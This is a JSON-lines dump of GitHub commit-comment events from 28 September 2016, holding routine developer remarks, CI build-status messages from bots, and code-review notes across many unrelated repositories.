{"id":"4630874806","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19207745,"position":null,"line":null,"path":null,"commit_id":"65af9b8a623de6faa71c39ca0b9583a69c2d1fc3","created_at":"2016-09-28T14:05:06Z","updated_at":"2016-09-28T14:05:06Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1190](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14475&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 260, ignored: 3 Build time: 00:11:24"}},"created_at":"2016-09-28T14:05:06Z"}
{"id":"4630876080","type":"CommitCommentEvent","actor":{"login":"criunix"},"repo":{"name":"x-drum/ansible-rsyslog"},"payload":{"comment":{"id":19207749,"position":null,"line":null,"path":null,"commit_id":"05d10208a137c1c87d3a0143032fe9029f0ab213","created_at":"2016-09-28T14:05:17Z","updated_at":"2016-09-28T14:05:17Z","body":"fix deprecate variable"}},"created_at":"2016-09-28T14:05:17Z"}
{"id":"4630877349","type":"CommitCommentEvent","actor":{"login":"AlexeyBatrachenko"},"repo":{"name":"AlexeyBatrachenko/Roofnest"},"payload":{"comment":{"id":19207751,"position":null,"line":null,"path":null,"commit_id":"8224b23ea3626c1a7363e4c8c315c3f22e137185","created_at":"2016-09-28T14:05:28Z","updated_at":"2016-09-28T14:05:28Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Разработка модели БД](https://trello.com/c/h8xREaEO/25--)"}},"created_at":"2016-09-28T14:05:28Z"}
{"id":"4630880495","type":"CommitCommentEvent","actor":{"login":"emmanouil"},"repo":{"name":"gpac/gpac"},"payload":{"comment":{"id":19207759,"position":null,"line":null,"path":null,"commit_id":"705e199c8eadf35774520206d7f7cf1a043c0539","created_at":"2016-09-28T14:05:58Z","updated_at":"2016-09-28T14:05:58Z","body":"I do not think so; the error message has to to with the Android SDK. It cannot find it, no matter whether you set its path as an argument to the build script, or you have set the ANDROID_HOME variable"}},"created_at":"2016-09-28T14:05:58Z"}
{"id":"4630882083","type":"CommitCommentEvent","actor":{"login":"barnstee"},"repo":{"name":"OPCFoundation/UA-.NETStandardLibrary"},"payload":{"comment":{"id":19207767,"position":null,"line":null,"path":null,"commit_id":"624e7192ded2c9abd198fd84cc15a9c84391645a","created_at":"2016-09-28T14:06:12Z","updated_at":"2016-09-28T14:06:12Z","body":"The net45 package seems to also support net46. "}},"created_at":"2016-09-28T14:06:12Z"}
{"id":"4630887918","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/example-addon-repo"},"payload":{"comment":{"id":19207783,"position":null,"line":null,"path":null,"commit_id":"cd567f7565366b34e06a93a0898ff5934b62fcb5","created_at":"2016-09-28T14:07:10Z","updated_at":"2016-09-28T14:07:10Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#W8cI3DMGTo6npTTKgUH9rQ"}},"created_at":"2016-09-28T14:07:10Z"}
{"id":"4630889951","type":"CommitCommentEvent","actor":{"login":"RodolpheFouquet"},"repo":{"name":"gpac/gpac"},"payload":{"comment":{"id":19207788,"position":null,"line":null,"path":null,"commit_id":"705e199c8eadf35774520206d7f7cf1a043c0539","created_at":"2016-09-28T14:07:28Z","updated_at":"2016-09-28T14:07:28Z","body":"Error message? Can you show me the error message? Have you tried opening the project and compiling it with android studio directly?"}},"created_at":"2016-09-28T14:07:28Z"}
{"id":"4630891541","type":"CommitCommentEvent","actor":{"login":"coppolachan"},"repo":{"name":"paboyle/Grid"},"payload":{"comment":{"id":19207793,"position":null,"line":null,"path":null,"commit_id":"7ea4b959a4cda6b42b5bdcb07d6c8080798b4c3c","created_at":"2016-09-28T14:07:43Z","updated_at":"2016-09-28T14:07:43Z","body":"Notice that the Threading output looks not so portable: it says \"no\" in my machine but I am definitely using all the 4 threads.\r\n\r\n"}},"created_at":"2016-09-28T14:07:43Z"}
{"id":"4630898973","type":"CommitCommentEvent","actor":{"login":"perliedman"},"repo":{"name":"perliedman/leaflet-realtime"},"payload":{"comment":{"id":19207808,"position":null,"line":null,"path":null,"commit_id":"f78633710f0686373ca7c9a0a2ce3d5b2ef585ef","created_at":"2016-09-28T14:08:55Z","updated_at":"2016-09-28T14:08:55Z","body":"@SidramBiradar post an issue, not a comment on a random commit!\r\n\r\nHaving said that, you should use one of the files in the `dist` folder instead of using `leaflet-realtime.js` directly."}},"created_at":"2016-09-28T14:08:55Z"}
{"id":"4630899160","type":"CommitCommentEvent","actor":{"login":"jasoncwilley"},"repo":{"name":"jasoncwilley/PostHit"},"payload":{"comment":{"id":19207809,"position":null,"line":null,"path":null,"commit_id":"ff691f18e6e78c52e8d906b3ec4abad8ac215f0e","created_at":"2016-09-28T14:08:57Z","updated_at":"2016-09-28T14:08:57Z","body":"stopping point of day 1"}},"created_at":"2016-09-28T14:08:57Z"}
{"id":"4630901495","type":"CommitCommentEvent","actor":{"login":"vaseemahmed01"},"repo":{"name":"vaseemahmed01/vaseem"},"payload":{"comment":{"id":19207820,"position":null,"line":null,"path":null,"commit_id":"b425260c8c6c805c2e9e1a806ed99f3e434505c1","created_at":"2016-09-28T14:09:18Z","updated_at":"2016-09-28T14:09:18Z","body":"commit by me"}},"created_at":"2016-09-28T14:09:18Z"}
{"id":"4630908728","type":"CommitCommentEvent","actor":{"login":"NathanWolf"},"repo":{"name":"elBukkit/MagicPlugin"},"payload":{"comment":{"id":19207831,"position":null,"line":null,"path":null,"commit_id":"5e4e9dd0e3781bddc24c9970b210d2c1fc3ad116","created_at":"2016-09-28T14:10:28Z","updated_at":"2016-09-28T14:10:28Z","body":"Hm- did this not already happen? I mean there is/was specific code in there already to cast spells on damage, including a whole complicated avoid-infinite-recursion mechanism for spells that cause damage :\\"}},"created_at":"2016-09-28T14:10:28Z"}
{"id":"4630911574","type":"CommitCommentEvent","actor":{"login":"gonebeta"},"repo":{"name":"lifeinthegrid/duplicator"},"payload":{"comment":{"id":19207839,"position":null,"line":null,"path":null,"commit_id":"9a732877be0a3cad8ff30681919ef03ea78defec","created_at":"2016-09-28T14:10:55Z","updated_at":"2016-09-28T14:10:55Z","body":"Hi,\r\n\r\nDoes this version fix the strict MySQL version issue?"}},"created_at":"2016-09-28T14:10:55Z"}
{"id":"4630911666","type":"CommitCommentEvent","actor":{"login":"phlare"},"repo":{"name":"DarkstarProject/darkstar"},"payload":{"comment":{"id":19207841,"position":null,"line":null,"path":null,"commit_id":"085eafb6ab5590803da2b2550c8fbdaf1e4db993","created_at":"2016-09-28T14:10:55Z","updated_at":"2016-09-28T14:10:55Z","body":"aha!  thanks for this"}},"created_at":"2016-09-28T14:10:55Z"}
{"id":"4630914287","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":19207847,"position":null,"line":null,"path":null,"commit_id":"edce2caf2c1d0dcf20e73cb5b4deba86a264f45c","created_at":"2016-09-28T14:11:22Z","updated_at":"2016-09-28T14:11:22Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://dev.visitry.org/ui#review:id=84)"}},"created_at":"2016-09-28T14:11:22Z"}
{"id":"4630917535","type":"CommitCommentEvent","actor":{"login":"JoinRajuncraftNow"},"repo":{"name":"JoinRajuncraftNow/Stuff"},"payload":{"comment":{"id":19207850,"position":null,"line":null,"path":null,"commit_id":"472fb5e0b73ef9c88d19bcbcfc0f0548c244114d","created_at":"2016-09-28T14:11:53Z","updated_at":"2016-09-28T14:11:53Z","body":"Lol, you realize this will only ever run on the school laptops, right?"}},"created_at":"2016-09-28T14:11:53Z"}
{"id":"4630919647","type":"CommitCommentEvent","actor":{"login":"jsmeix"},"repo":{"name":"rear/rear"},"payload":{"comment":{"id":19207858,"position":null,"line":null,"path":null,"commit_id":"847323fbedefda7376530bd2e3e13cae87fa9b38","created_at":"2016-09-28T14:12:13Z","updated_at":"2016-09-28T14:12:13Z","body":"@philippebolduc \r\ncan you do a GitHub pull request for your intended changes\r\nso that we can see what you actually like to have changed."}},"created_at":"2016-09-28T14:12:13Z"}
{"id":"4630924245","type":"CommitCommentEvent","actor":{"login":"ys2adol"},"repo":{"name":"ys2adol/moneyManagement"},"payload":{"comment":{"id":19207864,"position":null,"line":null,"path":null,"commit_id":"72574297a079a47bb8152bb1abf01a5d66663623","created_at":"2016-09-28T14:12:52Z","updated_at":"2016-09-28T14:12:52Z","body":"グローバル変数を削除したのにはどの様な意図がありますか？"}},"created_at":"2016-09-28T14:12:52Z"}
{"id":"4630927094","type":"CommitCommentEvent","actor":{"login":"kaushalmodi"},"repo":{"name":"Silex/emacs-config"},"payload":{"comment":{"id":19207869,"position":null,"line":null,"path":null,"commit_id":"a7c1ac88285cdc07b3907091e5e61e9d2e2e3ecd","created_at":"2016-09-28T14:13:17Z","updated_at":"2016-09-28T14:13:17Z","body":"I ended up here while browsing through random emacs configs.. I haven't read through this in detail. But I can comment on one thing.. In case you did not know, you can have just one `(setq use-package-always-ensure t)` instead of putting `:ensure t` for each `use-package` form. And for the ones where you do not want to auto-install the package, put `:ensure nil`."}},"created_at":"2016-09-28T14:13:17Z"}
{"id":"4630928042","type":"CommitCommentEvent","actor":{"login":"sadhyama"},"repo":{"name":"sadhyama/parodus"},"payload":{"comment":{"id":19207872,"position":null,"line":null,"path":null,"commit_id":"c3c8f99152f928d05bc586815d73889f0f9dfbe5","created_at":"2016-09-28T14:13:25Z","updated_at":"2016-09-28T14:13:25Z","body":"Added code changes to send upstream msg to server when parodus receives msgType other than 9. This changes are tested and it is working fine. Testing for parodus end to end flow is done by integration testing added as part of simple test executable."}},"created_at":"2016-09-28T14:13:25Z"}
{"id":"4630930935","type":"CommitCommentEvent","actor":{"login":"psyhtest"},"repo":{"name":"dividiti/gemmbench"},"payload":{"comment":{"id":19207880,"position":null,"line":null,"path":null,"commit_id":"696084e316cac56c6b009a46c479020cb4f8cd34","created_at":"2016-09-28T14:13:50Z","updated_at":"2016-09-28T14:13:50Z","body":"Relative addressing `../kernels/sgemm.cl` was not ideal, but at least it worked. `/data/local/tmp/kernels/sgemm.cl` doesn't. Not to worry, I'll fix this soon..."}},"created_at":"2016-09-28T14:13:50Z"}
{"id":"4630933890","type":"CommitCommentEvent","actor":{"login":"caryan"},"repo":{"name":"BBN-Q/APS2-Comms"},"payload":{"comment":{"id":19207891,"position":null,"line":null,"path":null,"commit_id":"8d5424abaa03062c6b255e3acda7fa59c418b5ff","created_at":"2016-09-28T14:14:18Z","updated_at":"2016-09-28T14:14:18Z","body":"Yeah, I was comparing to the files from ComBlock which have a CR.  Fixed in 0add64c39b0f449b2da19327d8e9978968815ce4"}},"created_at":"2016-09-28T14:14:18Z"}
{"id":"4630935227","type":"CommitCommentEvent","actor":{"login":"adahemas"},"repo":{"name":"ys2adol/moneyManagement"},"payload":{"comment":{"id":19207894,"position":null,"line":null,"path":null,"commit_id":"72574297a079a47bb8152bb1abf01a5d66663623","created_at":"2016-09-28T14:14:31Z","updated_at":"2016-09-28T14:14:31Z","body":"カッコ悪いからさ"}},"created_at":"2016-09-28T14:14:31Z"}
{"id":"4630938532","type":"CommitCommentEvent","actor":{"login":"dasois"},"repo":{"name":"dasois/material2"},"payload":{"comment":{"id":19207897,"position":3,"line":2,"path":"README.md","commit_id":"62ec57208beb35939042d3ec9d027fcff9f4c548","created_at":"2016-09-28T14:15:02Z","updated_at":"2016-09-28T14:15:02Z","body":"badge is still wrong..."}},"created_at":"2016-09-28T14:15:02Z"}
{"id":"4630938927","type":"CommitCommentEvent","actor":{"login":"iqbal-lab"},"repo":{"name":"rmnorris/pandora"},"payload":{"comment":{"id":19207898,"position":null,"line":null,"path":null,"commit_id":"214d6f07f2bc0467e465acc5aac7f9b733717e31","created_at":"2016-09-28T14:15:05Z","updated_at":"2016-09-28T14:15:05Z","body":":-)"}},"created_at":"2016-09-28T14:15:05Z"}
{"id":"4630942871","type":"CommitCommentEvent","actor":{"login":"bvaughn"},"repo":{"name":"JedWatson/react-select"},"payload":{"comment":{"id":19207906,"position":65,"line":87,"path":"src/Async.js","commit_id":"b319024b20745e2cf788e7d08978376b493a08ac","created_at":"2016-09-28T14:15:41Z","updated_at":"2016-09-28T14:15:41Z","body":"The way it's intended for use is that `cache` is an empty `Object` by default and you can pass `false` to _disable_ it.\r\n\r\nI didn't write the docs but I guess they're a bit unclear on that fact. You don't need to pass `cache={true}`. Just omit the property if you want to enable the cache."}},"created_at":"2016-09-28T14:15:41Z"}
{"id":"4630946200","type":"CommitCommentEvent","actor":{"login":"ys2adol"},"repo":{"name":"ys2adol/moneyManagement"},"payload":{"comment":{"id":19207917,"position":null,"line":null,"path":null,"commit_id":"72574297a079a47bb8152bb1abf01a5d66663623","created_at":"2016-09-28T14:16:11Z","updated_at":"2016-09-28T14:16:11Z","body":"承知しました。\n"}},"created_at":"2016-09-28T14:16:11Z"}
{"id":"4630946390","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/example-addon-repo"},"payload":{"comment":{"id":19207918,"position":null,"line":null,"path":null,"commit_id":"caa03a2e75792084f90950a1e70dfb52a0e4fbf0","created_at":"2016-09-28T14:16:13Z","updated_at":"2016-09-28T14:16:13Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#C0EvCn8FSRGeFisQYw_XPA"}},"created_at":"2016-09-28T14:16:13Z"}
{"id":"4630946414","type":"CommitCommentEvent","actor":{"login":"Swinxin"},"repo":{"name":"Swinxin/Algorithms"},"payload":{"comment":{"id":19207919,"position":null,"line":null,"path":null,"commit_id":"2a9c204feee9df4388c08ab4990b4e701ff9db59","created_at":"2016-09-28T14:16:13Z","updated_at":"2016-09-28T14:16:13Z","body":" `给定一个有n个正整数的数组A和一个整数sum，求选择数组A中部分数字和为sum的方案数。 \r\n      当两种选择方案有一个数字的下标不一样，我们就认为是不同的组成方案 `\r\n    **输入例子**\r\n       ```5 15\r\n       5 5 10 2 3 ```\r\n   **输出例子**\r\n       ```4```"}},"created_at":"2016-09-28T14:16:13Z"}
{"id":"4630950344","type":"CommitCommentEvent","actor":{"login":"fbernier"},"repo":{"name":"adgear/resque-lock"},"payload":{"comment":{"id":19207928,"position":5,"line":56,"path":"lib/resque/plugins/lock.rb","commit_id":"6c364409195c2c59f2ec0c53526379ff34accb88","created_at":"2016-09-28T14:16:45Z","updated_at":"2016-09-28T14:16:45Z","body":"Oops you it should be `Resque.encode` instead of just `encode`\r\n\r\nAlso, do you think this fixes the same issue? https://github.com/defunkt/resque-lock/pull/6/files"}},"created_at":"2016-09-28T14:16:45Z"}
{"id":"4630952009","type":"CommitCommentEvent","actor":{"login":"csurf"},"repo":{"name":"openLRSng/openLRSng"},"payload":{"comment":{"id":19207933,"position":null,"line":null,"path":null,"commit_id":"69f745e06d669ec79b77f4121a184eadacb502e0","created_at":"2016-09-28T14:17:00Z","updated_at":"2016-09-28T14:17:00Z","body":"this patch needs to be applied to TX.h as well, for SBUS input..."}},"created_at":"2016-09-28T14:17:00Z"}
{"id":"4630953679","type":"CommitCommentEvent","actor":{"login":"mgudemann"},"repo":{"name":"cristina-david/cbmc"},"payload":{"comment":{"id":19207938,"position":null,"line":null,"path":null,"commit_id":"d7e8294357d6d3293671043ab341f0526cdec092","created_at":"2016-09-28T14:17:15Z","updated_at":"2016-09-28T14:17:15Z","body":"ok, changed"}},"created_at":"2016-09-28T14:17:15Z"}
{"id":"4630964183","type":"CommitCommentEvent","actor":{"login":"Lilyheart"},"repo":{"name":"MontCode/code_review"},"payload":{"comment":{"id":19207960,"position":4,"line":5,"path":"piccini_c/tribute/tribute.css","commit_id":"cd557037fc398f360472861bcb2314c98515e582","created_at":"2016-09-28T14:18:52Z","updated_at":"2016-09-28T14:18:52Z","body":"The vendor prefix goes before the selector"}},"created_at":"2016-09-28T14:18:52Z"}
{"id":"4630967241","type":"CommitCommentEvent","actor":{"login":"lifeinthegrid"},"repo":{"name":"lifeinthegrid/duplicator"},"payload":{"comment":{"id":19207971,"position":null,"line":null,"path":null,"commit_id":"9a732877be0a3cad8ff30681919ef03ea78defec","created_at":"2016-09-28T14:19:18Z","updated_at":"2016-09-28T14:19:18Z","body":"This does not address that issue, as of now it needs to be addressed in the my.ini file.  Not sure if there is a way to fix the issue via PHP."}},"created_at":"2016-09-28T14:19:18Z"}
{"id":"4630967274","type":"CommitCommentEvent","actor":{"login":"Shazwazza"},"repo":{"name":"umbraco/Umbraco-CMS"},"payload":{"comment":{"id":19207970,"position":20,"line":341,"path":"build/NuSpecs/tools/Web.config.install.xdt","commit_id":"248177f518908dd531e6d36553c4d4dc726f8396","created_at":"2016-09-28T14:19:18Z","updated_at":"2016-09-28T14:19:18Z","body":"lol.... doh! good catch"}},"created_at":"2016-09-28T14:19:18Z"}
{"id":"4630972347","type":"CommitCommentEvent","actor":{"login":"Lilyheart"},"repo":{"name":"MontCode/code_review"},"payload":{"comment":{"id":19207982,"position":7,"line":8,"path":"piccini_c/tribute/tribute.css","commit_id":"cd557037fc398f360472861bcb2314c98515e582","created_at":"2016-09-28T14:20:04Z","updated_at":"2016-09-28T14:20:04Z","body":"Place the fallback selector immediately before the one you really want.  When they are side by side it's easy to tell that you listed the same css line twice intentionally.  This helps make for clearer and more explicit code."}},"created_at":"2016-09-28T14:20:04Z"}
{"id":"4630974524","type":"CommitCommentEvent","actor":{"login":"Bodeguero"},"repo":{"name":"JadeEmu/JadeCore_547"},"payload":{"comment":{"id":19207984,"position":null,"line":null,"path":null,"commit_id":"e7f6bf7e37d7f701295eba4443a6bea80078eaed","created_at":"2016-09-28T14:20:22Z","updated_at":"2016-09-28T14:20:22Z","body":"@Keital nice job!"}},"created_at":"2016-09-28T14:20:22Z"}
{"id":"4630981044","type":"CommitCommentEvent","actor":{"login":"Lilyheart"},"repo":{"name":"MontCode/code_review"},"payload":{"comment":{"id":19208003,"position":19,"line":22,"path":"piccini_c/tribute/tribute.css","commit_id":"cd557037fc398f360472861bcb2314c98515e582","created_at":"2016-09-28T14:21:19Z","updated_at":"2016-09-28T14:21:19Z","body":"I'm guessing you used the / for a comment.  Commenting code in web development can be annoying because it seems every language handles commenting differently!  In CSS you wrap the text in `/*` `*/` tags."}},"created_at":"2016-09-28T14:21:19Z"}
{"id":"4630981529","type":"CommitCommentEvent","actor":{"login":"Cherubis"},"repo":{"name":"huluoyang/freecodecamp.cn"},"payload":{"comment":{"id":19208005,"position":null,"line":null,"path":null,"commit_id":"cb2b374c917540721522062e2776133a0ccf9cf2","created_at":"2016-09-28T14:21:23Z","updated_at":"2016-09-28T14:21:23Z","body":"很迷惑。第一次到这里来。新的世界？"}},"created_at":"2016-09-28T14:21:23Z"}
{"id":"4630984323","type":"CommitCommentEvent","actor":{"login":"teresa-vogl"},"repo":{"name":"h-kalesse/Dop-Spec"},"payload":{"comment":{"id":19208010,"position":189,"line":540,"path":"read_kazr_spectra.m","commit_id":"5e6a81f48a406a51a361aa0e575cd8ce916824a2","created_at":"2016-09-28T14:21:49Z","updated_at":"2016-09-28T14:21:49Z","body":"reorganized peak marking section - most importantly: Power must be added!"}},"created_at":"2016-09-28T14:21:49Z"}
{"id":"4630990821","type":"CommitCommentEvent","actor":{"login":"retailcoder"},"repo":{"name":"rubberduck-vba/Rubberduck"},"payload":{"comment":{"id":19208026,"position":11,"line":18,"path":"Rubberduck.VBEEditor/VBEHost/ExcelApp.cs","commit_id":"0bacf498f6f6f73296ed4cebdb4cb76284447c8b","created_at":"2016-09-28T14:22:49Z","updated_at":"2016-09-28T14:22:49Z","body":"The `ProjectDisplayName` can't be used here. This breaks unit testing."}},"created_at":"2016-09-28T14:22:49Z"}
{"id":"4630990855","type":"CommitCommentEvent","actor":{"login":"Lyadis"},"repo":{"name":"SINTEF-9012/ThingML"},"payload":{"comment":{"id":19208027,"position":null,"line":null,"path":null,"commit_id":"8309903043030b3fde727dbabdc9987665fa6ad5","created_at":"2016-09-28T14:22:50Z","updated_at":"2016-09-28T14:22:50Z","body":"Of course not, it is merely customizing my code."}},"created_at":"2016-09-28T14:22:50Z"}
{"id":"4630994901","type":"CommitCommentEvent","actor":{"login":"Aniq55"},"repo":{"name":"Aniq55/Poly-Graph-Plotter"},"payload":{"comment":{"id":19208041,"position":null,"line":null,"path":null,"commit_id":"afb54319182472ddc6884336d02d010b1da60b46","created_at":"2016-09-28T14:23:26Z","updated_at":"2016-09-28T14:23:26Z","body":"sure. I'm adding right now.\n\nOn Wed, Sep 28, 2016 at 6:27 PM, Suvojit Manna <notifications@github.com>\nwrote:\n\n> Can you please add a bit more information about the project ??\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/Aniq55/Poly-Graph-Plotter/commit/afb54319182472ddc6884336d02d010b1da60b46#commitcomment-19206775>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ATN-Mg72pD-qNYhc3LpLdeW3gag_C26eks5qumQmgaJpZM4KIyU9>\n> .\n>\n"}},"created_at":"2016-09-28T14:23:26Z"}
{"id":"4630994975","type":"CommitCommentEvent","actor":{"login":"wesleywiser"},"repo":{"name":"OneDrive/onedrive-sdk-csharp"},"payload":{"comment":{"id":19208042,"position":19,"line":107,"path":"src/OneDriveSdk/Requests/Generated/DriveRequestBuilder.cs","commit_id":"eb576161e872ebe1eada0c327d6864e75e3148bd","created_at":"2016-09-28T14:23:27Z","updated_at":"2016-09-28T14:23:27Z","body":"Did you mean to change this? The return type is still `ISpecialCollectionRequestBuilder`"}},"created_at":"2016-09-28T14:23:27Z"}
{"id":"4630998163","type":"CommitCommentEvent","actor":{"login":"wesleywiser"},"repo":{"name":"OneDrive/onedrive-sdk-csharp"},"payload":{"comment":{"id":19208052,"position":13,"line":71,"path":"src/OneDriveSdk/Requests/Generated/IDriveRequestBuilder.cs","commit_id":"eb576161e872ebe1eada0c327d6864e75e3148bd","created_at":"2016-09-28T14:23:58Z","updated_at":"2016-09-28T14:23:58Z","body":"Same"}},"created_at":"2016-09-28T14:23:58Z"}
{"id":"4630999855","type":"CommitCommentEvent","actor":{"login":"wesleywiser"},"repo":{"name":"OneDrive/onedrive-sdk-csharp"},"payload":{"comment":{"id":19208057,"position":2,"line":2,"path":"src/OneDriveSdk/Requests/Generated/ISharedWithMeCollectionPage.cs","commit_id":"eb576161e872ebe1eada0c327d6864e75e3148bd","created_at":"2016-09-28T14:24:13Z","updated_at":"2016-09-28T14:24:13Z","body":"You probably want 2016 here"}},"created_at":"2016-09-28T14:24:13Z"}
{"id":"4631000768","type":"CommitCommentEvent","actor":{"login":"philippebolduc"},"repo":{"name":"rear/rear"},"payload":{"comment":{"id":19208059,"position":null,"line":null,"path":null,"commit_id":"847323fbedefda7376530bd2e3e13cae87fa9b38","created_at":"2016-09-28T14:24:21Z","updated_at":"2016-09-28T14:24:21Z","body":"Ok I will try but i've never done that before.\n\n\nThanks.\n\nPhilippe Bolduc\nAdministrateur système Linux / Programmeur analyste\nLinux System Administrator / Programmer Analyst\n\n<http://www.florenceinc.com/>\n3382, boul. Industriel\nLaval (Québec)\nH7L 4R9\nT :: 514-875-7525 #235\nF :: 514-875-7536\nC :: philippe@florenceinc.com\nW :: florenceinc.com\nLe 2016-09-28 à 10:12, Johannes Meixner a écrit :\n>\n> @philippebolduc <https://github.com/philippebolduc>\n> can you do a GitHub pull request for your intended changes\n> so that we can see what you actually like to have changed.\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub \n> <https://github.com/rear/rear/commit/847323fbedefda7376530bd2e3e13cae87fa9b38#commitcomment-19207858>, \n> or mute the thread \n> <https://github.com/notifications/unsubscribe-auth/AJuhY9EgmyOjBabDJMJUE3fsonFLQO4yks5qunXAgaJpZM4KI2mY>.\n>\n\n"}},"created_at":"2016-09-28T14:24:21Z"}
{"id":"4631003180","type":"CommitCommentEvent","actor":{"login":"blackearth2014"},"repo":{"name":"devernay/openfx-misc"},"payload":{"comment":{"id":19208062,"position":null,"line":null,"path":null,"commit_id":"d80a81ae66911f54a382438efa47d1b1771a29d1","created_at":"2016-09-28T14:24:42Z","updated_at":"2016-09-28T14:24:42Z","body":"Okay!!! Now I get it."}},"created_at":"2016-09-28T14:24:42Z"}
{"id":"4631003950","type":"CommitCommentEvent","actor":{"login":"udeved"},"repo":{"name":"calamares/calamares"},"payload":{"comment":{"id":19208063,"position":null,"line":null,"path":null,"commit_id":"fc8e29bf35680cdd96a21f636f9b5be3b78038a7","created_at":"2016-09-28T14:24:49Z","updated_at":"2016-09-28T14:24:49Z","body":"Sounds good to me, selectable shell is nice."}},"created_at":"2016-09-28T14:24:49Z"}
{"id":"4631008401","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimWindowsUI"},"payload":{"comment":{"id":19208077,"position":null,"line":null,"path":null,"commit_id":"9df2b4594e8b0f4d62e8221b7ee109de8b5ef31d","created_at":"2016-09-28T14:25:27Z","updated_at":"2016-09-28T14:25:27Z","body":"TeamCity Xbim :: Xbim Windows UI :: Xbim Windows UI [Build 146](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1254&buildTypeId=Xbim_XbimWindowsUi_XbimWindowsUi) is now running\n"}},"created_at":"2016-09-28T14:25:27Z"}
{"id":"4631009216","type":"CommitCommentEvent","actor":{"login":"blackio"},"repo":{"name":"blackio/hazy-shade"},"payload":{"comment":{"id":19208078,"position":30,"line":30,"path":"build/index.html","commit_id":"bcf452b1abb96bd0c788a285f2b0b0a54c04fcba","created_at":"2016-09-28T14:25:35Z","updated_at":"2016-09-28T14:25:35Z","body":"2) предположил, что стоит отдельно выделить элемент, который изменяется в зависимости от статуса пользователя (бэкенд части)\r\n1) согласен, учту"}},"created_at":"2016-09-28T14:25:35Z"}
{"id":"4631009563","type":"CommitCommentEvent","actor":{"login":"Lilyheart"},"repo":{"name":"MontCode/code_review"},"payload":{"comment":{"id":19208079,"position":28,"line":30,"path":"piccini_c/tribute/tribute.css","commit_id":"cd557037fc398f360472861bcb2314c98515e582","created_at":"2016-09-28T14:25:38Z","updated_at":"2016-09-28T14:25:38Z","body":"> After a zero length, the unit identifier is optional.\r\n\r\nhttps://www.w3.org/TR/CSS2/syndata.html#length-units\r\n\r\nYou will see the px dropped most of the time after the 0.  It makes for smaller code files when your files start to get very large.  There are a few other arguments for dropping or keeping the identifier so ultimately it's a personal choice, or if you work at a company, it's the companies choice.  Neither is *technically* wrong."}},"created_at":"2016-09-28T14:25:38Z"}
{"id":"4631010943","type":"CommitCommentEvent","actor":{"login":"carsim101"},"repo":{"name":"carsim101/rfid_project"},"payload":{"comment":{"id":19208081,"position":null,"line":null,"path":null,"commit_id":"156791fb39ee841f0c3731793b52e6a09716ad59","created_at":"2016-09-28T14:25:50Z","updated_at":"2016-09-28T14:25:50Z","body":"Lol. Hahaha dal.a nya imung laptop\r\n"}},"created_at":"2016-09-28T14:25:50Z"}
{"id":"4631012502","type":"CommitCommentEvent","actor":{"login":"Lilyheart"},"repo":{"name":"MontCode/code_review"},"payload":{"comment":{"id":19208086,"position":34,"line":36,"path":"piccini_c/tribute/tribute.css","commit_id":"cd557037fc398f360472861bcb2314c98515e582","created_at":"2016-09-28T14:26:04Z","updated_at":"2016-09-28T14:26:04Z","body":"See the `.cross` selector in the css for futher details"}},"created_at":"2016-09-28T14:26:04Z"}
{"id":"4631013955","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimWindowsUI"},"payload":{"comment":{"id":19208093,"position":null,"line":null,"path":null,"commit_id":"9df2b4594e8b0f4d62e8221b7ee109de8b5ef31d","created_at":"2016-09-28T14:26:17Z","updated_at":"2016-09-28T14:26:17Z","body":"TeamCity Xbim :: Xbim Windows UI :: Xbim Windows UI [Build 146](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1254&buildTypeId=Xbim_XbimWindowsUi_XbimWindowsUi) outcome was **FAILURE**\nSummary: Exit code 1 (new) Build time: 00:00:50"}},"created_at":"2016-09-28T14:26:17Z"}
{"id":"4631016122","type":"CommitCommentEvent","actor":{"login":"retailcoder"},"repo":{"name":"rubberduck-vba/Rubberduck"},"payload":{"comment":{"id":19208097,"position":12,"line":19,"path":"Rubberduck.VBEEditor/VBEHost/ExcelApp.cs","commit_id":"0bacf498f6f6f73296ed4cebdb4cb76284447c8b","created_at":"2016-09-28T14:26:36Z","updated_at":"2016-09-28T14:26:36Z","body":"Ok, I see. This allows telling `Book1.TestMethod1` from `Book2.TestMethod1`, running *all* discovered tests and actually fixing a bug.\r\n\r\nThe problem is with `ProjectDisplayName`:\r\n\r\n    _projectDisplayName = _project.VBE.MainWindow.Caption.Split(' ').Last();\r\n\r\nThis assumes the `MainWindow` has no active code pane. When there is one, the project's display name contains the string `\"(Code)]\"`, and *that* is what's breaking unit testing."}},"created_at":"2016-09-28T14:26:36Z"}
{"id":"4631020814","type":"CommitCommentEvent","actor":{"login":"warpech"},"repo":{"name":"StarcounterPrefabs/Images"},"payload":{"comment":{"id":19208103,"position":9,"line":13,"path":"src/Images/ViewModels/ConceptIllustrationPage.json.cs","commit_id":"41e27303f248bb780181971ce401d7613db2a375","created_at":"2016-09-28T14:27:17Z","updated_at":"2016-09-28T14:27:17Z","body":"Thanks!"}},"created_at":"2016-09-28T14:27:17Z"}
